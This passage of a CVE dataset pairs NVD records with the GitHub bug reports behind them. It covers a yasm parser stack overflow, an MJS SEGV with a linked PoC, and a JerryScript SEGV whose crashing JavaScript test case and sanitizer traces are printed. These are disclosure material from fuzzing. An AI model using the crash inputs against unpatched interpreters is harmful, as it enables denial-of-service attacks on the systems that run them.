#68 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#69 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#70 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#71 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#72 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#73 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#74 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#75 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#76 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#77 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#78 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#79 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#80 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#81 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#82 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#83 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#84 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#85 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#86 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#87 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#88 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#89 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#90 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#91 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#92 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#93 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#94 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#95 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#96 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#97 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#98 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#99 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#100 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#101 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#102 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#103 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#104 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#105 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#106 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#107 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#108 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#109 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#110 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#111 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#112 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#113 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#114 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#115 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#116 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#117 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#118 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#119 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#120 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#121 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#122 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#123 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#124 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#125 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#126 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#127 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#128 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#129 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#130 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#131 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#132 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#133 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#134 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#135 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#136 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#137 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#138 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#139 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#140 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#141 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#142 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#143 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#144 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#145 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#146 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#147 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#148 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#149 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#150 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#151 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#152 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#153 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#154 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#155 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#156 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#157 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#158 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#159 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#160 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#161 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#162 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#163 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#164 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#165 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#166 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#167 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#168 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#169 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#170 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#171 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#172 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#173 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#174 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#175 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#176 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#177 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#178 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#179 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#180 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#181 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#182 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#183 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#184 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#185 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#186 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#187 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#188 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#189 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#190 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#191 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#192 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#193 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#194 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#195 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#196 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#197 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#198 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#199 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#200 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#201 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#202 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#203 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#204 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#205 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#206 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#207 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#208 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#209 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#210 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#211 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#212 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#213 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#214 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#215 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#216 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#217 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#218 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#219 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#220 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#221 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#222 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#223 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#224 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#225 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#226 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#227 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#228 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#229 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#230 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#231 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#232 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#233 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#234 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#235 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#236 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#237 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#238 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#239 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#240 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#241 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#242 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#243 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#244 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#245 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#246 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#247 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#248 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
SUMMARY: AddressSanitizer: stack-overflow /home/z1r0/fuzzing/yasm/yasm/./modules/parsers/nasm/nasm-token.re:117 in nasm_parser_lex
==3060203==ABORTING
```
## Reference
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr5/readme.md | stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1303 in parse_expr5 | https://api.github.com/repos/yasm/yasm/issues/218/comments | 1 | 2023-03-31T08:27:44Z | 2024-03-22T11:55:05Z | https://github.com/yasm/yasm/issues/218 | 1,648,929,873 | 218 |
CVE-2023-29570 | 2023-04-24T14:15:07.800 | Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_ffi_cb_free at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/240"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_fii2/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/cesanta/mjs/issues/240 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # SEGV src/mjs_ffi.c:982:24 in mjs_ffi_cb_free
## project address
https://github.com/cesanta/mjs
## info
OS:Ubuntu20.04 TLS
Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)`
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_fii2/poc5.zip
## ASAN Info
```c
./mjs poc5.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2363695==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffb91bf8b8 (pc 0x0000004dfc5e bp 0x7fffffffe070 sp 0x7fffffffdbd8 T0)
==2363695==The signal is caused by a READ memory access.
#0 0x4dfc5e in mjs_ffi_cb_free /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_ffi.c:982:24
#1 0x60400000000f (<unknown module>)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_ffi.c:982:24 in mjs_ffi_cb_free
==2363695==ABORTING
```
| SEGV src/mjs_ffi.c:982:24 in mjs_ffi_cb_free | https://api.github.com/repos/cesanta/mjs/issues/240/comments | 0 | 2023-03-06T01:27:09Z | 2023-03-06T01:27:09Z | https://github.com/cesanta/mjs/issues/240 | 1,610,488,659 | 240 |
CVE-2023-30406 | 2023-04-24T22:15:09.627 | Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component ecma_find_named_property at /base/ecma-helpers.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5058"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jerryscript-project/jerryscript/issues/5058 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
1a2c04763aba49f52b1537acd3730098c873511c
###### Build platform
Ubuntu 20.04.2 LTS (Linux 5.15.0-67-generic x86_64)
###### Build steps
Describe how to build JerryScript. Give all the necessary details of the build
(e.g., environment variables, command(s), profile, command line options, etc.).
E.g.:
```sh
tools/build.py --compile-flag=-fsanitize=address --compile-flag=-g
```
###### Build log
###### Test case
```JavaScript
function i(a,b=eval()){eval()}
i(i("a"),eval("var a"))
```
###### Execution platform
same as the build platform.
###### Execution steps
```sh
build/bin/jerry testcase.js
```
###### Output
Segmentation fault (core dumped)
###### Backtrace
=================================================================
==167385==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x562a05bd8581 bp 0x7fffdc027800 sp 0x7fffdc027790 T0)
==167385==The signal is caused by a READ memory access.
==167385==Hint: address points to the zero page.
#0 0x562a05bd8580 (/data/jerryscript/asan/bin/jerry+0xd0580)
#1 0x562a05b8051c (/data/jerryscript/asan/bin/jerry+0x7851c)
#2 0x562a05b9069f (/data/jerryscript/asan/bin/jerry+0x8869f)
#3 0x562a05b919b9 (/data/jerryscript/asan/bin/jerry+0x899b9)
#4 0x562a05b6b6d8 (/data/jerryscript/asan/bin/jerry+0x636d8)
#5 0x562a05bc14cd (/data/jerryscript/asan/bin/jerry+0xb94cd)
#6 0x562a05bc696a (/data/jerryscript/asan/bin/jerry+0xbe96a)
